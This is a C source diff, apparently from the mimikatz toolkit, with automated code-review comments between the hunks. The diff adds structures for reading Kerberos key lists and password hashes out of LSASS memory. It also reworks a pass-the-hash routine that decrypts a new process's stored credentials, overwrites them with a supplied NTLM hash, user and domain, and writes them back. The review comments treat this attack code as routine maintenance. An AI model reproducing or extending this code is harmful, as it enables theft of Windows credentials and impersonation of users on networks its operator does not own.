@ -85,7 +108,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION_51
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
PVOID unk23;
|
||||
PVOID pKeyList;
|
||||
PVOID unk24;
|
||||
LIST_ENTRY Tickets_1;
|
||||
LIST_ENTRY Tickets_2;
|
||||
@ -124,7 +147,7 @@ typedef struct _KIWI_KERBEROS_LOGON_SESSION
|
||||
PVOID unk20;
|
||||
PVOID unk21;
|
||||
PVOID unk22;
|
||||
PVOID unk23;
|
||||
PVOID pKeyList;
|
||||
LIST_ENTRY Tickets_1;
|
||||
FILETIME unk24;
|
||||
LIST_ENTRY Tickets_2;
|
||||
@ -235,3 +258,26 @@ typedef struct _KIWI_KERBEROS_INTERNAL_TICKET_6 {
|
||||
ULONG TicketKvno;
|
||||
KIWI_KERBEROS_BUFFER Ticket;
|
||||
} KIWI_KERBEROS_INTERNAL_TICKET_6, *PKIWI_KERBEROS_INTERNAL_TICKET_6;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_KEYS_LIST_5 {
|
||||
DWORD unk0; // dword_1233EC8 dd 4
|
||||
DWORD cbItem; // debug048:01233ECC dd 5
|
||||
PVOID unk1;
|
||||
PVOID unk2;
|
||||
//KERB_HASHPASSWORD_5 KeysEntries[ANYSIZE_ARRAY];
|
||||
} KIWI_KERBEROS_KEYS_LIST_5, *PKIWI_KERBEROS_KEYS_LIST_5;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_KEYS_LIST_6 {
|
||||
DWORD unk0; // dword_1233EC8 dd 4
|
||||
DWORD cbItem; // debug048:01233ECC dd 5
|
||||
PVOID unk1;
|
||||
PVOID unk2;
|
||||
PVOID unk3;
|
||||
PVOID unk4;
|
||||
//KERB_HASHPASSWORD_6 KeysEntries[ANYSIZE_ARRAY];
|
||||
} KIWI_KERBEROS_KEYS_LIST_6, *PKIWI_KERBEROS_KEYS_LIST_6;
|
||||
|
||||
typedef struct _KIWI_KERBEROS_ENUM_DATA_TICKET {
|
||||
BOOL isTicketExport;
|
||||
BOOL isFullTicket;
|
||||
} KIWI_KERBEROS_ENUM_DATA_TICKET, *PKIWI_KERBEROS_ENUM_DATA_TICKET;
|
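Review bot: The new KIWI_KERBEROS_KEYS_LIST_5 and KIWI_KERBEROS_KEYS_LIST_6 typedefs document their fields only with disassembler addresses (`// dword_1233EC8 dd 4`), which say nothing about meaning; `cbItem` is the word kuhl_m_sekurlsa_kerberos.c reads as the number of trailing entries, so `DWORD cbItem; // count of KERB_HASHPASSWORD_* entries laid out directly after this header` records what the code depends on, and the commented-out `KeysEntries` lines would read better as a one-line comment saying the same instead of dead code. `isFullTicket` in KIWI_KERBEROS_ENUM_DATA_TICKET is set to FALSE in kuhl_m_sekurlsa_kerberos_tickets and, as far as this commit's hunks show, never read; if it is reserved for a later change, a comment to that effect stops it being read as a bug.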
@ -24,14 +24,12 @@ LONG kuhl_m_sekurlsa_msv_enum(PKUHL_M_SEKURLSA_EXTERNAL callback, LPVOID state)
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL PKUHL_M_SEKURLSA_EXTERNAL externalCallback, IN OPTIONAL LPVOID externalCallbackData)
|
||||
{
|
||||
MSV1_0_STD_DATA stdData = {pData->LogonId, externalCallback, externalCallbackData};
|
||||
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, &stdData);
|
||||
kuhl_m_sekurlsa_msv_enum_cred(pData->cLsass, pData->pCredentials, kuhl_m_sekurlsa_msv_enum_cred_callback_std, pData->LogonId);
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
DWORD flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL;
|
||||
PMSV1_0_STD_DATA stdData = (PMSV1_0_STD_DATA) pOptionalData;
|
||||
|
||||
kprintf(L"\n\t [%08x] %Z", AuthenticationPackageId, &pCredentials->Primary);
|
||||
if(RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
@ -39,28 +37,32 @@ BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKIWI_MSV1_0_PRIMARY
|
||||
else if(RtlEqualString(&pCredentials->Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags |= KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, stdData->LogonId, flags, stdData->externalCallback, stdData->externalCallbackData);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) &pCredentials->Credentials, (PLUID) pOptionalData, flags, NULL, NULL);
|
||||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKIWI_MSV1_0_PRIMARY_CREDENTIALS pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData)
|
||||
{
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) (pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED) pOptionalData;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {pPrimaryCreds, &hLocalMemory};
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL)(pCredentials->Credentials.Buffer);
|
||||
PMSV1_0_PTH_DATA_CRED pthDataCred = (PMSV1_0_PTH_DATA_CRED)pOptionalData;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = { KULL_M_MEMORY_TYPE_OWN, NULL };
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = { pPrimaryCreds, &hLocalMemory };
|
||||
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->UserName.Buffer, pthDataCred->pthData->UserName, pPrimaryCreds->UserName.Length);
|
||||
RtlCopyMemory((PBYTE) pPrimaryCreds + (ULONG_PTR) pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
if (RtlEqualString(&pCredentials->Primary, &PRIMARY_STRING, FALSE))
|
||||
{
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaUnprotectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
RtlZeroMemory(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory(pPrimaryCreds->NtOwfPassword, pthDataCred->pthData->NtlmHash, LM_NTLM_HASH_LENGTH);
|
||||
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->UserName.Buffer, pthDataCred->pthData->UserName, pPrimaryCreds->UserName.Length);
|
||||
RtlCopyMemory((PBYTE)pPrimaryCreds + (ULONG_PTR)pPrimaryCreds->LogonDomainName.Buffer, pthDataCred->pthData->LogonDomain, pPrimaryCreds->LogonDomainName.Length);
|
||||
(*pthDataCred->pSecData->lsassLocalHelper->pLsaProtectMemory)(pPrimaryCreds, pCredentials->Credentials.Length);
|
||||
|
||||
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
|
||||
if(pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !\n");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
kprintf(L"Data copy @ %p : ", origBufferAddress->address);
|
||||
if (pthDataCred->pthData->isReplaceOk = kull_m_memory_copy(origBufferAddress, &aLocalMemory, pCredentials->Credentials.Length))
|
||||
kprintf(L"OK !");
|
||||
else PRINT_ERROR_AUTO(L"kull_m_memory_copy");
|
||||
}
|
||||
else kprintf(L".");
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
@ -80,73 +82,74 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
|
||||
NTSTATUS kuhl_m_sekurlsa_msv_pth(int argc, wchar_t * argv[])
|
||||
{
|
||||
BYTE ntlm[LM_NTLM_HASH_LENGTH] = {0};
|
||||
BYTE ntlm[LM_NTLM_HASH_LENGTH] = { 0 };
|
||||
TOKEN_STATISTICS tokenStats;
|
||||
MSV1_0_PTH_DATA data = {&(tokenStats.AuthenticationId), NULL, NULL, ntlm, FALSE};
|
||||
PCWCHAR szRun, szNTLM, pFakeUserName, pFakeLogonDomain;
|
||||
MSV1_0_PTH_DATA data = { &(tokenStats.AuthenticationId), NULL, NULL, ntlm, FALSE };
|
||||
PCWCHAR szRun, szNTLM;
|
||||
DWORD i, j, dwNeededSize;
|
||||
HANDLE hToken;
|
||||
PROCESS_INFORMATION processInfos;
|
||||
|
||||
if(pFakeUserName = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"user", &data.UserName))
|
||||
if (kull_m_string_args_byName(argc, argv, L"user", &data.UserName, NULL))
|
||||
{
|
||||
if(pFakeLogonDomain = kuhl_m_sekurlsa_msv_pth_makefakestring(argc, argv, L"domain", &data.LogonDomain))
|
||||
if (kull_m_string_args_byName(argc, argv, L"domain", &data.LogonDomain, NULL))
|
||||
{
|
||||
if(kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL))
|
||||
if (kull_m_string_args_byName(argc, argv, L"ntlm", &szNTLM, NULL))
|
||||
{
|
||||
kull_m_string_args_byName(argc, argv, L"run", &szRun, L"cmd.exe");
|
||||
if(wcslen(szNTLM) == (LM_NTLM_HASH_LENGTH * 2))
|
||||
if (wcslen(szNTLM) == (LM_NTLM_HASH_LENGTH * 2))
|
||||
{
|
||||
for(i = 0; i < LM_NTLM_HASH_LENGTH; i++)
|
||||
for (i = 0; i < LM_NTLM_HASH_LENGTH; i++)
|
||||
{
|
||||
swscanf_s(&szNTLM[i*2], L"%02x", &j);
|
||||
ntlm[i] = (BYTE) j;
|
||||
swscanf_s(&szNTLM[i * 2], L"%02x", &j);
|
||||
ntlm[i] = (BYTE)j;
|
||||
}
|
||||
kprintf(L"NTLM\t: "); kull_m_string_wprintf_hex(data.NtlmHash, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
|
||||
kprintf(L"Program\t: %s\n", szRun);
|
||||
if(kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, pFakeUserName, pFakeLogonDomain, L"", &processInfos, FALSE))
|
||||
if (kull_m_process_create(KULL_M_PROCESS_CREATE_LOGON, szRun, CREATE_SUSPENDED, NULL, LOGON_NETCREDENTIALS_ONLY, data.UserName, data.LogonDomain, L"", &processInfos, FALSE))
|
||||
{
|
||||
kprintf(
|
||||
L" | PID %u\n"
|
||||
L" | TID %u\n",
|
||||
L" | PID %u\n"
|
||||
L" | TID %u\n",
|
||||
processInfos.dwProcessId, processInfos.dwThreadId);
|
||||
if(OpenProcessToken(processInfos.hProcess, TOKEN_READ, &hToken))
|
||||
if (OpenProcessToken(processInfos.hProcess, TOKEN_READ, &hToken))
|
||||
{
|
||||
if(GetTokenInformation(hToken, TokenStatistics, &tokenStats, sizeof(tokenStats), &dwNeededSize))
|
||||
if (GetTokenInformation(hToken, TokenStatistics, &tokenStats, sizeof(tokenStats), &dwNeededSize))
|
||||
{
|
||||
kprintf(L" | LUID %u ; %u (%08x:%08x)\n", tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart, tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart);
|
||||
kprintf(L" \\_ ");
|
||||
kprintf(L" | LUID %u ; %u (%08x:%08x)\n", tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart, tokenStats.AuthenticationId.HighPart, tokenStats.AuthenticationId.LowPart);
|
||||
kprintf(L" \\_ ");
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_msv_pth, &data);
|
||||
} else PRINT_ERROR_AUTO(L"GetTokenInformation");
|
||||
kprintf(L"\n");
|
||||
if (data.isReplaceOk)
|
||||
{
|
||||
kprintf(L" \\_ ");
|
||||
kuhl_m_sekurlsa_enum(kuhl_m_sekurlsa_enum_callback_kerberos_pth, &data);
|
||||
kprintf(L"\n");
|
||||
}
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"GetTokenInformation");
|
||||
CloseHandle(hToken);
|
||||
} else PRINT_ERROR_AUTO(L"OpenProcessToken");
|
||||
NtResumeProcess(processInfos.hProcess);
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"OpenProcessToken");
|
||||
|
||||
if (data.isReplaceOk)
|
||||
NtResumeProcess(processInfos.hProcess);
|
||||
else
|
||||
NtTerminateProcess(processInfos.hProcess, STATUS_FATAL_APP_EXIT);
|
||||
|
||||
CloseHandle(processInfos.hThread);
|
||||
CloseHandle(processInfos.hProcess);
|
||||
} else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW");
|
||||
} else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n");
|
||||
} else PRINT_ERROR(L"Missing argument : ntlm\n");
|
||||
LocalFree((HLOCAL) pFakeLogonDomain);
|
||||
}
|
||||
else PRINT_ERROR_AUTO(L"CreateProcessWithLogonW");
|
||||
}
|
||||
else PRINT_ERROR(L"ntlm hash length must be 32 (16 bytes)\n");
|
||||
}
|
||||
else PRINT_ERROR(L"Missing argument : ntlm\n");
|
||||
}
|
||||
LocalFree((HLOCAL) pFakeUserName);
|
||||
}
|
||||
return STATUS_SUCCESS;
|
||||
}
|
||||
|
||||
PWCHAR kuhl_m_sekurlsa_msv_pth_makefakestring(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs)
|
||||
{
|
||||
PWCHAR ret = NULL;
|
||||
SIZE_T len;
|
||||
if(kull_m_string_args_byName(argc, argv, name, theArgs, NULL))
|
||||
{
|
||||
kprintf(L"%s\t: %s\n", name, *theArgs);
|
||||
len = wcslen(*theArgs);
|
||||
if(ret = (PWCHAR) LocalAlloc(LPTR, (len + 1) * sizeof(wchar_t)))
|
||||
wmemset(ret, L'-', len);
|
||||
} else PRINT_ERROR(L"Missing argument : %s\n", name);
|
||||
return ret;
|
||||
}
|
||||
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData)
|
||||
{
|
||||
KIWI_MSV1_0_CREDENTIALS credentials;
|
||||
|
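Review bot: In kuhl_m_sekurlsa_msv_pth, `j` is declared on the `DWORD i, j, dwNeededSize;` line without an initializer and `swscanf_s(&szNTLM[i * 2], L"%02x", &j);` discards its return value, so a character pair that is not hexadecimal leaves `j` unchanged — indeterminate on the first iteration — and `ntlm[i] = (BYTE)j;` then reads an uninitialized variable; the length check above only covers the string length. Declaring `DWORD i, j = 0, dwNeededSize;` removes the undefined read, and testing `swscanf_s(...) == 1` would let the function report the malformed argument instead of continuing with a partially filled array. The function also now frees `hToken` via `CloseHandle(hToken);` inside the OpenProcessToken branch, which looks correct, but the new `NtTerminateProcess` path should be checked for the same handle discipline since that part of the flow is only partially visible in this hunk.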
@ -65,5 +65,3 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
PWCHAR kuhl_m_sekurlsa_msv_pth_makefakestring(const int argc, const wchar_t * argv[], const wchar_t * name, const wchar_t ** theArgs);
|
||||
|
@ -45,6 +45,24 @@ typedef struct _CRYPTO_BUFFER {
|
||||
} CRYPTO_BUFFER, *PCRYPTO_BUFFER;
|
||||
typedef CONST CRYPTO_BUFFER *PCCRYPTO_BUFFER;
|
||||
|
||||
|
||||
typedef struct _KERB_HASHPASSWORD_GENERIC {
|
||||
DWORD Type;
|
||||
SIZE_T Size;
|
||||
PBYTE Checksump;
|
||||
} KERB_HASHPASSWORD_GENERIC, *PKERB_HASHPASSWORD_GENERIC;
|
||||
|
||||
typedef struct _KERB_HASHPASSWORD_5 {
|
||||
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
|
||||
KERB_HASHPASSWORD_GENERIC generic;
|
||||
} KERB_HASHPASSWORD_5, *PKERB_HASHPASSWORD_5;
|
||||
|
||||
typedef struct _KERB_HASHPASSWORD_6 {
|
||||
LSA_UNICODE_STRING salt; // http://tools.ietf.org/html/rfc3962
|
||||
PVOID stringToKey;
|
||||
KERB_HASHPASSWORD_GENERIC generic;
|
||||
} KERB_HASHPASSWORD_6, *PKERB_HASHPASSWORD_6;
|
||||
|
||||
extern VOID WINAPI MD4Init(PMD4_CTX pCtx);
|
||||
extern VOID WINAPI MD4Update(PMD4_CTX pCtx, LPCVOID data, DWORD cbData);
|
||||
extern VOID WINAPI MD4Final(PMD4_CTX pCtx);
|
||||
|
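Review bot: The new KERB_HASHPASSWORD_GENERIC, KERB_HASHPASSWORD_5 and KERB_HASHPASSWORD_6 typedefs carry no field comments, while the callers added in the same commit rely on two conventions: `Size` may be zero, in which case both kuhl_m_sekurlsa.c and kuhl_m_sekurlsa_kerberos.c substitute LM_NTLM_HASH_LENGTH, and `Checksump` holds an address in the inspected process (kuhl_m_sekurlsa.c reads it through cLsass.hLsassMem) rather than a local buffer. Recording that on the struct, e.g. `SIZE_T Size; // byte length; 0 means callers assume LM_NTLM_HASH_LENGTH` and `PBYTE Checksump; // address in the inspected process, not local memory`, keeps the contract next to the layout. `Checksump` also reads like a typo for `Checksum`; if the spelling intentionally mirrors the original symbol, a comment saying so would prevent a future rename.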